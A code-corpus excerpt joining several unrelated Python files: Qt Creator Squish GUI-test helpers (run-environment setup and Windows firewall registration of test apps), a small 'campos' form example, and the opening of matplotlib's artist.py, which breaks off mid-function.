test.log("Replacing SQUISH_LIBQTDIR with '%s'" % replacement)
changingVars.append("SQUISH_LIBQTDIR=%s" % replacement)
else:
changingVars.append(varName)
elif varName == "DYLD_FRAMEWORK_PATH" and platform.system() == 'Darwin':
value = str(model.data(model.index(index.row, 1)).toString())
test.log("Adding %s to DYLD_FRAMEWORK_PATH" % qtLibPath)
replacement = ":".join(filter(len, [qtLibPath, value]))
changingVars.append("%s=%s" % (varName, replacement))
batchEditRunEnvironment(kitCount, 0, changingVars, True)
switchViewTo(ViewConstants.EDIT)
return result
def batchEditRunEnvironment(kitCount, currentTarget, modifications, alreadyOnRunSettings=False):
if not alreadyOnRunSettings:
switchViewTo(ViewConstants.PROJECTS)
switchToBuildOrRunSettingsFor(kitCount, currentTarget, ProjectSettings.RUN)
ensureChecked(":RunSettingsEnvironmentDetails_Utils::DetailsButton")
clickButton(waitForObject("{text='Batch Edit...' type='QPushButton' unnamed='1' visible='1' "
"window=':Qt Creator_Core::Internal::MainWindow'}"))
editor = waitForObject("{type='TextEditor::SnippetEditorWidget' unnamed='1' visible='1' "
"window=':Edit Environment_ProjectExplorer::EnvironmentItemsDialog'}")
typeLines(editor, modifications)
clickButton(waitForObject("{text='OK' type='QPushButton' unnamed='1' visible='1' "
"window=':Edit Environment_ProjectExplorer::EnvironmentItemsDialog'}"))
def modifyRunSettingsForHookIntoQtQuickUI(kitCount, kit, workingDir, projectName, port, quickVersion="1.1"):
switchViewTo(ViewConstants.PROJECTS)
switchToBuildOrRunSettingsFor(kitCount, kit, ProjectSettings.RUN, True)
qtVersion, mkspec, qtLibPath, qmake = getQtInformationForQmlProject()
if None in (qtVersion, mkspec, qtLibPath, qmake):
test.fatal("At least one of the Qt information returned None - leaving...",
"Qt version: %s, mkspec: %s, Qt LibPath: %s, qmake: '%s'"
% (qtVersion, mkspec, qtLibPath, qmake))
return None
squishPath = getSquishPath(mkspec, qtVersion)
if squishPath == None:
test.warning("Could not determine the Squish path for %s/%s" % (qtVersion, mkspec),
"Using fallback of pushing STOP inside Creator.")
return None
test.log("Using (QtVersion/mkspec) %s/%s with SquishPath %s" % (qtVersion, mkspec, squishPath))
if quickVersion == "1.1":
if platform.system() == "Darwin":
executable = os.path.abspath(os.path.dirname(qmake) + "/QMLViewer.app")
else:
executable = os.path.abspath(os.path.dirname(qmake) + "/qmlviewer")
else:
executable = os.path.abspath(os.path.dirname(qmake) + "/qmlscene")
if platform.system() in ('Microsoft', 'Windows'):
executable = executable + ".exe"
startAUT = os.path.abspath(squishPath + "/bin/startaut")
if platform.system() in ('Microsoft', 'Windows'):
startAUT = startAUT + ".exe"
args = "--verbose --port=%d %s %s.qml" % (port, executable, projectName)
projectPath = os.path.abspath("%s/%s" % (workingDir, projectName))
__invokeAddCustomExecutable__(startAUT, args, projectPath)
clickButton(waitForObject("{text='Details' type='Utils::DetailsButton' unnamed='1' visible='1' "
"window=':Qt Creator_Core::Internal::MainWindow' "
"leftWidget={type='QLabel' text~='Us(e|ing) <b>Build Environment</b>'"
" unnamed='1' visible='1'}}"))
for varName in ("PATH", "SQUISH_LIBQTDIR"):
__addVariableToRunEnvironment__(varName, qtLibPath)
if not platform.system() in ('Microsoft', 'Windows', 'Darwin'):
__addVariableToRunEnvironment__("LD_LIBRARY_PATH", qtLibPath)
if platform.system() == "Darwin":
__addVariableToRunEnvironment__("DYLD_FRAMEWORK_PATH", qtLibPath)
if not platform.system() in ('Microsoft', 'Windows'):
if not os.getenv("DISPLAY"):
__addVariableToRunEnvironment__("DISPLAY", ":0.0")
result = executable
switchViewTo(ViewConstants.EDIT)
return result
# this helper method must be called on the run settings page of a Qt Quick UI with DetailsWidget
# for the run settings already opened - it won't work on other views because of a different layout
def __addVariableToRunEnvironment__(name, value):
clickButton(waitForObject("{text='Add' type='QPushButton' unnamed='1' visible='1' "
"container={window=':Qt Creator_Core::Internal::MainWindow' "
"type='Utils::DetailsWidget' unnamed='1' visible='1' occurrence='2'}}"))
varNameLineEd = waitForObject("{type='QExpandingLineEdit' visible='1' unnamed='1'}")
doubleClick(varNameLineEd)
replaceEditorContent(varNameLineEd, name)
type(varNameLineEd, "<Return>")
row = getTableRowOf(name, ":Qt Creator_QTableView")
if row == -1:
test.fatal("Could not find entered variable name inside table - skipping entering value.")
return
valueLineEd = __doubleClickQTableView__(":Qt Creator_QTableView", row, 1)
replaceEditorContent(valueLineEd, value)
type(valueLineEd, "<Return>")
def getTableRowOf(value, table):
tblModel = waitForObject(table).model()
items = dumpItems(tblModel)
if value in items:
return items.index(value)
else:
return -1
def __getMkspecFromQMakeConf__(qmakeConf):
if qmakeConf==None or not os.path.exists(qmakeConf):
return None
if not platform.system() in ('Microsoft', 'Windows'):
return os.path.basename(os.path.realpath(os.path.dirname(qmakeConf)))
mkspec = None
file = codecs.open(qmakeConf, "r", "utf-8")
for line in file:
if "QMAKESPEC_ORIGINAL" in line:
mkspec = line.split("=")[1]
break
file.close()
if mkspec == None:
test.warning("Could not determine mkspec from '%s'" % qmakeConf)
return None
return os.path.basename(mkspec)
def __getMkspecFromQmake__(qmakeCall):
if getOutputFromCmdline("%s -query QT_VERSION" % qmakeCall).strip().startswith("5."):
return getOutputFromCmdline("%s -query QMAKE_XSPEC" % qmakeCall).strip()
else:
QmakeConfPath = getOutputFromCmdline("%s -query QMAKE_MKSPECS" % qmakeCall).strip()
for tmpPath in QmakeConfPath.split(os.pathsep):
tmpPath = tmpPath + os.sep + "default" + os.sep +"qmake.conf"
result = __getMkspecFromQMakeConf__(tmpPath)
if result != None:
return result.strip()
test.warning("Could not find qmake.conf inside provided QMAKE_MKSPECS path",
"QMAKE_MKSPECS returned: '%s'" % QmakeConfPath)
return None
# helper that double clicks the table view at specified row and column
# returns the QExpandingLineEdit (the editable table cell)
def __doubleClickQTableView__(qtableView, row, column):
doubleClick(waitForObject("{container='%s' "
"type='QModelIndex' row='%d' column='%d'}" % (qtableView, row, column)), 5, 5, 0, Qt.LeftButton)
return waitForObject("{type='QExpandingLineEdit' visible='1' unnamed='1'}")
# this function configures the custom executable onto the run settings page (using startaut from Squish)
def __configureCustomExecutable__(projectName, port, mkspec, qmakeVersion):
startAUT = getSquishPath(mkspec, qmakeVersion)
if startAUT == None:
test.warning("Something went wrong determining the right Squish for %s / %s combination - "
"using fallback without hooking into subprocess." % (qmakeVersion, mkspec))
return False
else:
startAUT = os.path.abspath(startAUT + "/bin/startaut")
if platform.system() in ('Microsoft', 'Windows'):
startAUT += ".exe"
if not os.path.exists(startAUT):
test.warning("Configured Squish directory seems to be missing - using fallback without hooking into subprocess.",
"Failed to find '%s'" % startAUT)
return False
progressBarWait()
# the following is currently only configured for release builds (will be enhanced later)
if platform.system() in ('Microsoft', 'Windows'):
debOrRel = "release" + os.sep
else:
debOrRel = ""
args = "--verbose --port=%d %s%s" % (port, debOrRel, projectName)
__invokeAddCustomExecutable__(startAUT, args)
return True
# get the Squish path that is needed to successfully hook into the compiled app
def getSquishPath(mkspec, qmakev):
# assuming major and minor version will be enough
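    # Illustrative note (format inferred from the parsing below, values are
    # made up): every non-comment line of the QT_SQUISH_MAPFILE is expected to
    # hold four whitespace-separated fields, e.g.
    #   4.2  5.6  linux-g++  ~/squish-4.2-qt56x-linux64
    # i.e. Squish version, Qt version, mkspec and the Squish directory.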
squishVersion = "%d.%d" % (squishinfo.major, squishinfo.minor)
qmakev = ".".join(qmakev.split(".")[0:2])
path = None
mapfile = os.environ.get("QT_SQUISH_MAPFILE")
if mapfile and os.path.isfile(mapfile):
file = codecs.open(mapfile, "r", "utf-8")
pattern = re.compile("\s+")
for line in file:
if line[0] == "#":
continue
tmp = pattern.split(line, 3)
if (tmp[0].strip("'\"") == squishVersion and tmp[1].strip("'\"") == qmakev
and tmp[2].strip("'\"") == mkspec):
path = os.path.expanduser(tmp[3].strip().strip("'\""))
break
file.close()
else:
if not mapfile:
test.warning("Environment variable QT_SQUISH_MAPFILE isn't set. Using fallback test data.",
"See the README file how to use it.")
else:
test.warning("Environment variable QT_SQUISH_MAPFILE isn't set correctly or map file does not exist. Using fallback test data.",
"See the README file how to use it.")
# try the test data fallback
mapData = testData.dataset(os.getcwd() + "/../../shared_data/qt_squish_mapping.tsv")
for record in mapData:
if (testData.field(record, "squishversion") == squishVersion and
testData.field(record, "qtversion") == qmakev
and testData.field(record, "mkspec") == mkspec):
path = os.path.expanduser(testData.field(record, "path"))
break
if path == None:
test.warning("Haven't found suitable Squish version with matching Qt version and mkspec.",
"See the README file how to set up your environment.")
elif not os.path.exists(path):
test.warning("Squish path '%s' from fallback test data file does not exist!" % path,
"See the README file how to set up your environment.")
return None
return path
# function to add a program to allow communication through the win firewall
# param workingDir this directory is the parent of the project folder
# param projectName this is the name of the project (the folder inside workingDir as well as the name for the executable)
# param isReleaseBuild should currently always be set to True (will later add debug build testing)
def allowAppThroughWinFW(workingDir, projectName, isReleaseBuild=True):
if not __isWinFirewallRunning__():
return
# WinFirewall seems to run - hopefully no other
result = __configureFW__(workingDir, projectName, isReleaseBuild)
if result == 0:
test.log("Added %s to firewall" % projectName)
else:
test.fatal("Could not add %s as allowed program to win firewall" % projectName)
# function to delete a (former added) program from the win firewall
# param workingDir this directory is the parent of the project folder
# param projectName this is the name of the project (the folder inside workingDir as well as the name for the executable)
# param isReleaseBuild should currently always be set to True (will later add debug build testing)
def deleteAppFromWinFW(workingDir, projectName, isReleaseBuild=True):
if not __isWinFirewallRunning__():
return
# WinFirewall seems to run - hopefully no other
result = __configureFW__(workingDir, projectName, isReleaseBuild, False)
if result == 0:
test.log("Deleted %s from firewall" % projectName)
else:
test.warning("Could not delete %s as allowed program from win firewall" % (projectName))
# helper that can modify the win firewall to allow a program to communicate through it or delete it
# param addToFW defines whether to add (True) or delete (False) this program to/from the firewall
def __configureFW__(workingDir, projectName, isReleaseBuild, addToFW=True):
if isReleaseBuild == None:
if projectName[-4:] == ".exe":
projectName = projectName[:-4]
path = "%s%s%s" % (workingDir, os.sep, projectName)
elif isReleaseBuild:
path = "%s%s%s%srelease%s%s" % (workingDir, os.sep, projectName, os.sep, os.sep, projectName)
else:
path = "%s%s%s%sdebug%s%s" % (workingDir, os.sep, projectName, os.sep, os.sep, projectName)
if addToFW:
mode = "add"
enable = "ENABLE"
else:
mode = "delete"
enable = ""
projectName = ""
# Needs admin privileges on Windows 7
# Using the deprecated "netsh firewall" because the newer
# "netsh advfirewall" would need admin privileges on Windows Vista, too.
return subprocess.call('netsh firewall %s allowedprogram "%s.exe" %s %s' % (mode, path, projectName, enable))
# helper to check whether win firewall is running or not
# this doesn't check for other firewalls!
def __isWinFirewallRunning__():
if hasattr(__isWinFirewallRunning__, "fireWallState"):
return __isWinFirewallRunning__.fireWallState
    if not platform.system() in ('Microsoft', 'Windows'):
__isWinFirewallRunning__.fireWallState = False
return False
result = getOutputFromCmdline("netsh firewall show state")
for line in result.splitlines():
if "Operational mode" in line:
__isWinFirewallRunning__.fireWallState = not "Disable" in line
return __isWinFirewallRunning__.fireWallState
return None
def __fixQuotes__(string):
if platform.system() in ('Windows', 'Microsoft'):
string = '"' + string + '"'
return string
# this function adds the given executable as an attachable AUT
# Bad: executable/port could be empty strings - you should be aware of this
def addExecutableAsAttachableAUT(executable, port, host=None):
if not __checkParamsForAttachableAUT__(executable, port):
return False
if host == None:
host = "localhost"
squishSrv = __getSquishServer__()
if (squishSrv == None):
return False
result = subprocess.call(__fixQuotes__('"%s" --config addAttachableAUT "%s" %s:%s')
% (squishSrv, executable, host, port), shell=True)
if result == 0:
test.passes("Added %s as attachable AUT" % executable)
else:
test.fail("Failed to add %s as attachable AUT" % executable)
return result == 0
# this function removes the given executable as an attachable AUT
# Bad: executable/port could be empty strings - you should be aware of this
def removeExecutableAsAttachableAUT(executable, port, host=None):
if not __checkParamsForAttachableAUT__(executable, port):
return False
if host == None:
host = "localhost"
squishSrv = __getSquishServer__()
if (squishSrv == None):
return False
result = subprocess.call(__fixQuotes__('"%s" --config removeAttachableAUT "%s" %s:%s')
% (squishSrv, executable, host, port), shell=True)
if result == 0:
test.passes("Removed %s as attachable AUT" % executable)
else:
test.fail("Failed to remove %s as attachable AUT" % executable)
return result == 0
def __checkParamsForAttachableAUT__(executable, port):
return port != None and executable != None
def __getSquishServer__():
squishSrv = currentApplicationContext().environmentVariable("SQUISH_PREFIX")
if (squishSrv == ""):
test.fatal("SQUISH_PREFIX isn't set - leaving test")
return None
return os.path.abspath(squishSrv + "/bin/squishserver")
def __invokeAddCustomExecutable__(exe, args, workingDir=None):
addButton = waitForObject("{container={window=':Qt Creator_Core::Internal::MainWindow' "
"type='ProjectExplorer::Internal::RunSettingsWidget' unnamed='1' "
"visible='1'} occurrence='2' text='Add' type='QPushButton' "
"unnamed='1' visible='1'}")
clickButton(addButton)
addMenu = addButton.menu()
activateItem(waitForObjectItem(addMenu, 'Custom Executable'))
exePathChooser = waitForObject(":Executable:_Utils::PathChooser")
exeLineEd = getChildByClass(exePathChooser, "Utils::FancyLineEdit")
argLineEd = waitForObject("{buddy={window=':Qt Creator_Core::Internal::MainWindow' "
"type='QLabel' text='Arguments:' visible='1'} type='QLineEdit' "
"unnamed='1' visible='1'}")
wdPathChooser = waitForObject("{buddy={window=':Qt Creator_Core::Internal::MainWindow' "
"text='Working directory:' type='QLabel'} "
"type='Utils::PathChooser' unnamed='1' visible='1'}")
wdLineEd = getChildByClass(wdPathChooser, "Utils::FancyLineEdit")
replaceEditorContent(exeLineEd, exe)
replaceEditorContent(argLineEd, args)
if workingDir:
replaceEditorContent(wdLineEd, workingDir)
| lgpl-2.1 | -5,980,354,771,092,611,000 | 50.530414 | 140 | 0.646159 | false |
jbermudezcabrera/campos | examples/building.py | 1 | 2507 | """This example demonstrates the basics of building complete forms using campos.
It creates several fields, marking some of them as required and adding some
custom validation.
Finally, fields are added to a CreationForm, which has several buttons and a
custom callback connected to one of them. Once added, some related fields
are grouped.
"""
__author__ = 'Juan Manuel Bermúdez Cabrera'
def fake_create_person():
if form.valid:
msg = 'ID: {}<br/>'.format(form.id)
msg += 'Name: {}<br/>'.format(form.name)
msg += 'Last name: {}<br/>'.format(form.last_name)
msg += 'Phone: {}<br/>'.format(form.phone)
msg += 'Address: {}<br/>'.format(form.address)
msg += 'Country: {}<br/>'.format(form.country[0])
msg = 'New person created correctly with values:<br/>{}'.format(msg)
msg = '<html>{}</html>'.format(msg)
QMessageBox.information(None, 'Created', msg)
form.close()
def create_form():
id = campos.StringField(name='id', text='Personal ID', max_length=11,
required=True)
name = campos.StringField(name='name', text='Name', required=True)
last = campos.StringField(name='last_name', text='Last name', required=True)
val = campos.RegExp(r'\+?\d+', message='Invalid phone number')
phone = campos.StringField(name='phone', text='Phone number',
validators=[val])
address = campos.StringField(name='address', text='Home address')
country = campos.SelectField(name='country', text='Country', blank=True,
blank_text='Other', choices=['Cuba', 'EE.UU'],
default='Cuba')
fields = (id, name, last, phone, address, country)
global form
form = campos.CreationForm(on_save=fake_create_person, fields=fields)
form.setWindowTitle('Create Person')
# group some fields
form.group('Very personal info', ('phone', 'address'), layout='grid')
form.group('Identification', ['id', 'name', 'last_name'])
return form
if __name__ == '__main__':
import os
import sys
# set gui api to use
os.environ['QT_API'] = 'pyside'
from qtpy.QtWidgets import QMessageBox, QApplication
import campos
# set global settings for validation type and label positions
campos.Validation.set_current('instant')
campos.Labelling.set_current('top')
app = QApplication(sys.argv)
dialog = create_form()
sys.exit(dialog.exec_())
| mit | 6,705,875,902,798,463,000 | 32.864865 | 80 | 0.623703 | false |
jeffery-do/Vizdoombot | doom/lib/python3.5/site-packages/matplotlib/artist.py | 4 | 46827 | from __future__ import (absolute_import, division, print_function,
unicode_literals)
from matplotlib.externals import six
import re
import warnings
import inspect
import numpy as np
import matplotlib
import matplotlib.cbook as cbook
from matplotlib.cbook import mplDeprecation
from matplotlib import docstring, rcParams
from .transforms import (Bbox, IdentityTransform, TransformedBbox,
TransformedPath, Transform)
from .path import Path
# Note, matplotlib artists use the doc strings for set and get
# methods to enable the introspection methods of setp and getp. Every
# set_* method should have a docstring containing the line
#
# ACCEPTS: [ legal | values ]
#
# and aliases for setters and getters should have a docstring that
# starts with 'alias for ', as in 'alias for set_somemethod'
#
# You may wonder why we use so much boiler-plate manually defining the
# set_alias and get_alias functions, rather than using some clever
# python trick. The answer is that I need to be able to manipulate
# the docstring, and there is no clever way to do that in python 2.2,
# as far as I can see - see
#
# https://mail.python.org/pipermail/python-list/2004-October/242925.html
def allow_rasterization(draw):
"""
Decorator for Artist.draw method. Provides routines
that run before and after the draw call. The before and after functions
    are useful for changing artist-dependent renderer attributes or making
other setup function calls, such as starting and flushing a mixed-mode
renderer.
"""
def before(artist, renderer):
if artist.get_rasterized():
renderer.start_rasterizing()
if artist.get_agg_filter() is not None:
renderer.start_filter()
def after(artist, renderer):
if artist.get_agg_filter() is not None:
renderer.stop_filter(artist.get_agg_filter())
if artist.get_rasterized():
renderer.stop_rasterizing()
# the axes class has a second argument inframe for its draw method.
def draw_wrapper(artist, renderer, *args, **kwargs):
before(artist, renderer)
draw(artist, renderer, *args, **kwargs)
after(artist, renderer)
# "safe wrapping" to exactly replicate anything we haven't overridden above
draw_wrapper.__name__ = draw.__name__
draw_wrapper.__dict__ = draw.__dict__
draw_wrapper.__doc__ = draw.__doc__
draw_wrapper._supports_rasterization = True
return draw_wrapper
def _stale_axes_callback(self, val):
if self.axes:
self.axes.stale = val
class Artist(object):
"""
Abstract base class for someone who renders into a
:class:`FigureCanvas`.
"""
aname = 'Artist'
zorder = 0
def __init__(self):
self._stale = True
self.stale_callback = None
self._axes = None
self.figure = None
self._transform = None
self._transformSet = False
self._visible = True
self._animated = False
self._alpha = None
self.clipbox = None
self._clippath = None
self._clipon = True
self._label = ''
self._picker = None
self._contains = None
self._rasterized = None
self._agg_filter = None
self._mouseover = False
self.eventson = False # fire events only if eventson
self._oid = 0 # an observer id
self._propobservers = {} # a dict from oids to funcs
try:
self.axes = None
except AttributeError:
# Handle self.axes as a read-only property, as in Figure.
pass
self._remove_method = None
self._url = None
self._gid = None
self._snap = None
self._sketch = rcParams['path.sketch']
self._path_effects = rcParams['path.effects']
def __getstate__(self):
d = self.__dict__.copy()
# remove the unpicklable remove method, this will get re-added on load
# (by the axes) if the artist lives on an axes.
d['_remove_method'] = None
d['stale_callback'] = None
return d
def remove(self):
"""
Remove the artist from the figure if possible. The effect
will not be visible until the figure is redrawn, e.g., with
:meth:`matplotlib.axes.Axes.draw_idle`. Call
:meth:`matplotlib.axes.Axes.relim` to update the axes limits
if desired.
Note: :meth:`~matplotlib.axes.Axes.relim` will not see
collections even if the collection was added to axes with
*autolim* = True.
Note: there is no support for removing the artist's legend entry.
"""
# There is no method to set the callback. Instead the parent should
# set the _remove_method attribute directly. This would be a
# protected attribute if Python supported that sort of thing. The
# callback has one parameter, which is the child to be removed.
if self._remove_method is not None:
self._remove_method(self)
# clear stale callback
self.stale_callback = None
_ax_flag = False
if hasattr(self, 'axes') and self.axes:
# remove from the mouse hit list
self.axes.mouseover_set.discard(self)
# mark the axes as stale
self.axes.stale = True
# decouple the artist from the axes
self.axes = None
_ax_flag = True
if self.figure:
self.figure = None
if not _ax_flag:
self.figure = True
else:
raise NotImplementedError('cannot remove artist')
# TODO: the fix for the collections relim problem is to move the
# limits calculation into the artist itself, including the property of
# whether or not the artist should affect the limits. Then there will
# be no distinction between axes.add_line, axes.add_patch, etc.
# TODO: add legend support
def have_units(self):
'Return *True* if units are set on the *x* or *y* axes'
ax = self.axes
if ax is None or ax.xaxis is None:
return False
return ax.xaxis.have_units() or ax.yaxis.have_units()
def convert_xunits(self, x):
"""For artists in an axes, if the xaxis has units support,
convert *x* using xaxis unit type
"""
ax = getattr(self, 'axes', None)
if ax is None or ax.xaxis is None:
return x
return ax.xaxis.convert_units(x)
def convert_yunits(self, y):
"""For artists in an axes, if the yaxis has units support,
convert *y* using yaxis unit type
"""
ax = getattr(self, 'axes', None)
if ax is None or ax.yaxis is None:
return y
return ax.yaxis.convert_units(y)
def set_axes(self, axes):
"""
Set the :class:`~matplotlib.axes.Axes` instance in which the
artist resides, if any.
This has been deprecated in mpl 1.5, please use the
axes property. Will be removed in 1.7 or 2.0.
ACCEPTS: an :class:`~matplotlib.axes.Axes` instance
"""
warnings.warn(_get_axes_msg.format('set_axes'), mplDeprecation,
stacklevel=1)
self.axes = axes
def get_axes(self):
"""
Return the :class:`~matplotlib.axes.Axes` instance the artist
resides in, or *None*.
This has been deprecated in mpl 1.5, please use the
axes property. Will be removed in 1.7 or 2.0.
"""
warnings.warn(_get_axes_msg.format('get_axes'), mplDeprecation,
stacklevel=1)
return self.axes
@property
def axes(self):
"""
The :class:`~matplotlib.axes.Axes` instance the artist
resides in, or *None*.
"""
return self._axes
@axes.setter
def axes(self, new_axes):
if (new_axes is not None and
(self._axes is not None and new_axes != self._axes)):
raise ValueError("Can not reset the axes. You are "
"probably trying to re-use an artist "
"in more than one Axes which is not "
"supported")
self._axes = new_axes
if new_axes is not None and new_axes is not self:
self.stale_callback = _stale_axes_callback
return new_axes
@property
def stale(self):
"""
If the artist is 'stale' and needs to be re-drawn for the output to
match the internal state of the artist.
"""
return self._stale
@stale.setter
def stale(self, val):
self._stale = val
# if the artist is animated it does not take normal part in the
# draw stack and is not expected to be drawn as part of the normal
# draw loop (when not saving) so do not propagate this change
if self.get_animated():
return
if val and self.stale_callback is not None:
self.stale_callback(self, val)
def get_window_extent(self, renderer):
"""
Get the axes bounding box in display space.
Subclasses should override for inclusion in the bounding box
"tight" calculation. Default is to return an empty bounding
box at 0, 0.
Be careful when using this function, the results will not update
        if the window extent of the artist changes. The extent
can change due to any changes in the transform stack, such as
changing the axes limits, the figure size, or the canvas used
(as is done when saving a figure). This can lead to unexpected
behavior where interactive figures will look fine on the screen,
but will save incorrectly.
"""
return Bbox([[0, 0], [0, 0]])
def add_callback(self, func):
"""
Adds a callback function that will be called whenever one of
the :class:`Artist`'s properties changes.
Returns an *id* that is useful for removing the callback with
:meth:`remove_callback` later.
"""
oid = self._oid
self._propobservers[oid] = func
self._oid += 1
return oid
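    # Minimal usage sketch (hypothetical callback, not part of the original
    # docs):
    #   cid = artist.add_callback(lambda a: print('property changed'))
    #   ...
    #   artist.remove_callback(cid)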
def remove_callback(self, oid):
"""
Remove a callback based on its *id*.
.. seealso::
:meth:`add_callback`
For adding callbacks
"""
try:
del self._propobservers[oid]
except KeyError:
pass
def pchanged(self):
"""
Fire an event when property changed, calling all of the
registered callbacks.
"""
for oid, func in six.iteritems(self._propobservers):
func(self)
def is_transform_set(self):
"""
Returns *True* if :class:`Artist` has a transform explicitly
set.
"""
return self._transformSet
def set_transform(self, t):
"""
Set the :class:`~matplotlib.transforms.Transform` instance
used by this artist.
ACCEPTS: :class:`~matplotlib.transforms.Transform` instance
"""
self._transform = t
self._transformSet = True
self.pchanged()
self.stale = True
def get_transform(self):
"""
Return the :class:`~matplotlib.transforms.Transform`
instance used by this artist.
"""
if self._transform is None:
self._transform = IdentityTransform()
elif (not isinstance(self._transform, Transform)
and hasattr(self._transform, '_as_mpl_transform')):
self._transform = self._transform._as_mpl_transform(self.axes)
return self._transform
def hitlist(self, event):
"""
List the children of the artist which contain the mouse event *event*.
"""
L = []
try:
hascursor, info = self.contains(event)
if hascursor:
L.append(self)
except:
import traceback
traceback.print_exc()
print("while checking", self.__class__)
for a in self.get_children():
L.extend(a.hitlist(event))
return L
def get_children(self):
"""
Return a list of the child :class:`Artist`s this
:class:`Artist` contains.
"""
return []
def contains(self, mouseevent):
"""Test whether the artist contains the mouse event.
Returns the truth value and a dictionary of artist specific details of
selection, such as which points are contained in the pick radius. See
individual artists for details.
"""
if six.callable(self._contains):
return self._contains(self, mouseevent)
warnings.warn("'%s' needs 'contains' method" % self.__class__.__name__)
return False, {}
def set_contains(self, picker):
"""
Replace the contains test used by this artist. The new picker
should be a callable function which determines whether the
artist is hit by the mouse event::
hit, props = picker(artist, mouseevent)
If the mouse event is over the artist, return *hit* = *True*
and *props* is a dictionary of properties you want returned
with the contains test.
ACCEPTS: a callable function
"""
self._contains = picker
def get_contains(self):
"""
Return the _contains test used by the artist, or *None* for default.
"""
return self._contains
def pickable(self):
'Return *True* if :class:`Artist` is pickable.'
return (self.figure is not None and
self.figure.canvas is not None and
self._picker is not None)
def pick(self, mouseevent):
"""
call signature::
pick(mouseevent)
each child artist will fire a pick event if *mouseevent* is over
the artist and the artist has picker set
"""
# Pick self
if self.pickable():
picker = self.get_picker()
if six.callable(picker):
inside, prop = picker(self, mouseevent)
else:
inside, prop = self.contains(mouseevent)
if inside:
self.figure.canvas.pick_event(mouseevent, self, **prop)
# Pick children
for a in self.get_children():
# make sure the event happened in the same axes
ax = getattr(a, 'axes', None)
if mouseevent.inaxes is None or ax is None or \
mouseevent.inaxes == ax:
# we need to check if mouseevent.inaxes is None
# because some objects associated with an axes (e.g., a
# tick label) can be outside the bounding box of the
# axes and inaxes will be None
# also check that ax is None so that it traverse objects
# which do no have an axes property but children might
a.pick(mouseevent)
def set_picker(self, picker):
"""
Set the epsilon for picking used by this artist
*picker* can be one of the following:
* *None*: picking is disabled for this artist (default)
* A boolean: if *True* then picking will be enabled and the
artist will fire a pick event if the mouse event is over
the artist
* A float: if picker is a number it is interpreted as an
epsilon tolerance in points and the artist will fire
          off an event if its data is within epsilon of the mouse
event. For some artists like lines and patch collections,
the artist may provide additional data to the pick event
that is generated, e.g., the indices of the data within
epsilon of the pick event
* A function: if picker is callable, it is a user supplied
function which determines whether the artist is hit by the
mouse event::
hit, props = picker(artist, mouseevent)
          to determine the hit test. If the mouse event is over the
          artist, return *hit=True* and *props* is a dictionary of
          properties you want added to the PickEvent attributes.
ACCEPTS: [None|float|boolean|callable]
"""
self._picker = picker
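    # Illustrative calls covering the picker flavours listed above (names are
    # hypothetical):
    #   line.set_picker(True)       # fire a pick event whenever the artist is hit
    #   line.set_picker(5)          # 5 points tolerance around the data
    #   line.set_picker(my_picker)  # callable: hit, props = my_picker(artist, event)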
def get_picker(self):
'Return the picker object used by this artist'
return self._picker
def is_figure_set(self):
"""
Returns True if the artist is assigned to a
:class:`~matplotlib.figure.Figure`.
"""
return self.figure is not None
def get_url(self):
"""
Returns the url
"""
return self._url
def set_url(self, url):
"""
Sets the url for the artist
ACCEPTS: a url string
"""
self._url = url
def get_gid(self):
"""
Returns the group id
"""
return self._gid
def set_gid(self, gid):
"""
Sets the (group) id for the artist
ACCEPTS: an id string
"""
self._gid = gid
def get_snap(self):
"""
Returns the snap setting which may be:
* True: snap vertices to the nearest pixel center
* False: leave vertices as-is
* None: (auto) If the path contains only rectilinear line
segments, round to the nearest pixel center
Only supported by the Agg and MacOSX backends.
"""
if rcParams['path.snap']:
return self._snap
else:
return False
def set_snap(self, snap):
"""
Sets the snap setting which may be:
* True: snap vertices to the nearest pixel center
* False: leave vertices as-is
* None: (auto) If the path contains only rectilinear line
segments, round to the nearest pixel center
Only supported by the Agg and MacOSX backends.
"""
self._snap = snap
self.stale = True
def get_sketch_params(self):
"""
Returns the sketch parameters for the artist.
Returns
-------
sketch_params : tuple or `None`
A 3-tuple with the following elements:
* `scale`: The amplitude of the wiggle perpendicular to the
source line.
* `length`: The length of the wiggle along the line.
* `randomness`: The scale factor by which the length is
shrunken or expanded.
May return `None` if no sketch parameters were set.
"""
return self._sketch
def set_sketch_params(self, scale=None, length=None, randomness=None):
"""
Sets the sketch parameters.
Parameters
----------
scale : float, optional
The amplitude of the wiggle perpendicular to the source
line, in pixels. If scale is `None`, or not provided, no
sketch filter will be provided.
length : float, optional
The length of the wiggle along the line, in pixels
(default 128.0)
randomness : float, optional
The scale factor by which the length is shrunken or
expanded (default 16.0)
"""
if scale is None:
self._sketch = None
else:
self._sketch = (scale, length or 128.0, randomness or 16.0)
self.stale = True
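    # Illustrative call (arbitrary values): a hand-drawn, xkcd-like wiggle
    # could be requested with
    #   artist.set_sketch_params(scale=1.0, length=100.0, randomness=2.0)
    # while calling set_sketch_params() with no arguments clears it again.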
def set_path_effects(self, path_effects):
"""
set path_effects, which should be a list of instances of
matplotlib.patheffect._Base class or its derivatives.
"""
self._path_effects = path_effects
self.stale = True
def get_path_effects(self):
return self._path_effects
def get_figure(self):
"""
Return the :class:`~matplotlib.figure.Figure` instance the
artist belongs to.
"""
return self.figure
def set_figure(self, fig):
"""
Set the :class:`~matplotlib.figure.Figure` instance the artist
belongs to.
ACCEPTS: a :class:`matplotlib.figure.Figure` instance
"""
# if this is a no-op just return
if self.figure is fig:
return
# if we currently have a figure (the case of both `self.figure`
        # and `fig` being none is taken care of above) then the user is
# trying to change the figure an artist is associated with which
# is not allowed for the same reason as adding the same instance
# to more than one Axes
if self.figure is not None:
raise RuntimeError("Can not put single artist in "
"more than one figure")
self.figure = fig
if self.figure and self.figure is not self:
self.pchanged()
self.stale = True
def set_clip_box(self, clipbox):
"""
Set the artist's clip :class:`~matplotlib.transforms.Bbox`.
ACCEPTS: a :class:`matplotlib.transforms.Bbox` instance
"""
self.clipbox = clipbox
self.pchanged()
self.stale = True
def set_clip_path(self, path, transform=None):
"""
Set the artist's clip path, which may be:
* a :class:`~matplotlib.patches.Patch` (or subclass) instance
* a :class:`~matplotlib.path.Path` instance, in which case
an optional :class:`~matplotlib.transforms.Transform`
instance may be provided, which will be applied to the
path before using it for clipping.
* *None*, to remove the clipping path
For efficiency, if the path happens to be an axis-aligned
rectangle, this method will set the clipping box to the
corresponding rectangle and set the clipping path to *None*.
ACCEPTS: [ (:class:`~matplotlib.path.Path`,
:class:`~matplotlib.transforms.Transform`) |
:class:`~matplotlib.patches.Patch` | None ]
"""
from matplotlib.patches import Patch, Rectangle
success = False
if transform is None:
if isinstance(path, Rectangle):
